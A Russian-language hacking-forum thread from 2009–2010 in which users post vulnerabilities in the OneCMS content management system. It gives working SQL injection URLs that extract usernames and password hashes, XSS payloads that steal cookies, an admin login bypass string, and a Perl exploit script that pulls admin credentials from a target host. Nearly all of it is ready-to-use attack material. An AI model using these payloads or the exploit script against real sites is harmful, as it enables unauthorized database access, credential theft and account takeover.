ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

OneCMS
  #1  
Старый 08.11.2009, 07:31
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию OneCMS

OneCMS

SQL Иньекция.
Цитата:
/elite.php?user=-1'+union+select+1,2,3,4,5,6,7,8,9,10+--+
Уязвимый код:
PHP код:
    $row mysql_fetch_row(mysql_query("SELECT aim,msn,website,nickname,location,username,yahoo,icq,gtalk,birthday FROM onecms_profile WHERE id = '".$_GET['user']."'"));
    
$aim stripslashes($row[0]);
    
$msn stripslashes($row[1]);
    
$website stripslashes($row[2]);
    
$nickname stripslashes($row[3]);
    
$location stripslashes($row[4]);
    
$yahoo stripslashes($row[6]);
    
$icq stripslashes($row[7]);
    
$gtalk stripslashes($row[8]);
    
$bday explode("|"$row[9]); 
Цитата:
/boards.php?t=report&id=-1'+union+select+1,2,3,4,5,6+--+
Уязвимый код:
PHP код:
if (($_GET['t'] == "report") && ($_GET['id'])) {
$id $_GET['id'];
$info mysql_fetch_row(mysql_query("SELECT subject,type,tid,uid,ip,fid FROM onecms_posts WHERE id = '".$id."'")); 
(Выводимое поле 1)
Цитата:
/index.php?list=1'+union+select+1,2,3,4,5,6,7,8,9,1 0,11+--+
Уязвимый код:
PHP код:
$sql mysql_query("SELECT * FROM onecms_content WHERE cat = '".$_GET['list']."' AND systems = '".$_GET['s']."' AND games = '".$_GET['g']."' AND name LIKE '".$_GET['abc']."%' AND ver = '0' ORDER BY `".$by."` ".$type." LIMIT ".$limit); 
(Выводимое поле 2)
Активная XSS:
/topic1.html
Отвечаем:
Цитата:
javascript:alert()
 
Ответить с цитированием

  #2  
Старый 28.02.2010, 14:41
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

OneCMS v2.5

1) sql injection (требования: mq=off)

file: boards.php

PHP код:
$res "SELECT * FROM ".$pre."users";
if (
$_GET['rank']) {
$res .= " WHERE rank = '".$_GET['rank']."'";
}
$res .= " ORDER BY `id` DESC";
$query mysql_query($res); 
result:

Код:
boards.php?t=list&rank=Queen'+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13+from+onecms_users+--+
//очень много инъекций..
 
Ответить с цитированием

  #3  
Старый 28.02.2010, 18:23
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Иньекций много, но уже фильтруються

OneCMS v2.5.

Пути:
Цитата:
/index.php?load=elite&view=friends&user[]=

/index.php?load=elite
Аву на %00 меняем.

Пассивная XSS:
Цитата:
/index.php?load=elite&view=collectio1n'</title><script>alert(document.cookie);</script><title>123&user=
Активная XSS:
Цитата:
index.php?load=elite
в AIM: <script>alert(document.cookie);</script>
Там ещё в админке auth By pass, но чо то редирект глючный, проверьте у себя
 
Ответить с цитированием

  #4  
Старый 04.03.2010, 21:43
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от Ctacok  
Там ещё в админке auth By pass, но чо то редирект глючный, проверьте у себя
хм.. у меня всё нормально..


1) By pass (требования: mq=off)

file: admin.php

PHP код:
if ($_GET['load'] == "login") {
$admin_page "yes";
if (
$_GET['login'] == "yes") {
$usernameb check(stripcslashes($_POST['username']));
$passwordc check($_POST['password']); 
$passwordb md5($passwordc);

$sql mysql_query("SELECT * FROM ".$pre."users WHERE username = '".$usernameb."' AND password = '".$passwordb."' LIMIT 1");
$login_check mysql_num_rows($sql); 
result:

login: ' or 1=1#
pass: -


2) sql injection (требования: mq=off)

file:index.php

PHP код:
if ($_GET['user']) {
    
$row mysql_fetch_row(mysql_query("SELECT aim,msn,website,nickname,location,username,yahoo,icq,gtalk,birthday,id FROM ".$pre."profile WHERE username = '".$_GET['user']."'"));
    echo 
profile($row[10], $_GET['user']);
    } 
result:

Код:
/index.php?load=elite&user=1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11+from+onecms_users+--+

Последний раз редактировалось .:[melkiy]:.; 04.03.2010 в 21:57..
 
Ответить с цитированием

  #5  
Старый 05.03.2010, 13:25
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
хм.. у меня всё нормально..
....

file:index.php

PHP код:
if ($_GET['user']) {
    
$row mysql_fetch_row(mysql_query("SELECT aim,msn,website,nickname,location,username,yahoo,icq,gtalk,birthday,id FROM ".$pre."profile WHERE username = '".$_GET['user']."'"));
    echo 
profile($row[10], $_GET['user']);
    } 
result:

Код:
/index.php?load=elite&user=1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11+from+onecms_users+--+
Ну про второе я тоже видел, просто у меня в PHP mq = on был
Накидал сплойтик.
PHP код:
#!/usr/bin/perl 
use LWP::Simple;
print 
"\n";
print 
"##############################################################\n";
print 
"# ONECMS v2.5 SQL INJECTION                                  #\n";
print 
"# Bug founded by: .:[melkiy]:.                               #\n";
print 
"# Exploit coded by: Ctacok                                   #\n";
print 
"# Special for Antichat (forum.antichat.ru)                   #\n";
print 
"# Require : Magic_quotes = Off                               #\n";
print 
"##############################################################\n";
if (@
ARGV 2)
{
print 
"\n Usage: exploit.pl [host] [path] ";
print 
"\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2];   #  PREFIX TABLES, Default: onecms
$vuln "-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+".$prefix."_users";
$doc get($host.$path."index.php?load=elite&user=".$vuln."+--+");
if (
$doc =~ /:::(.+):(.+):(.+):::/){
            print 
"\n[+] Admin id: : $1";
        print 
"\n[+] Admin email: $2";
        print 
"\n[+] Admin password: $3";

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ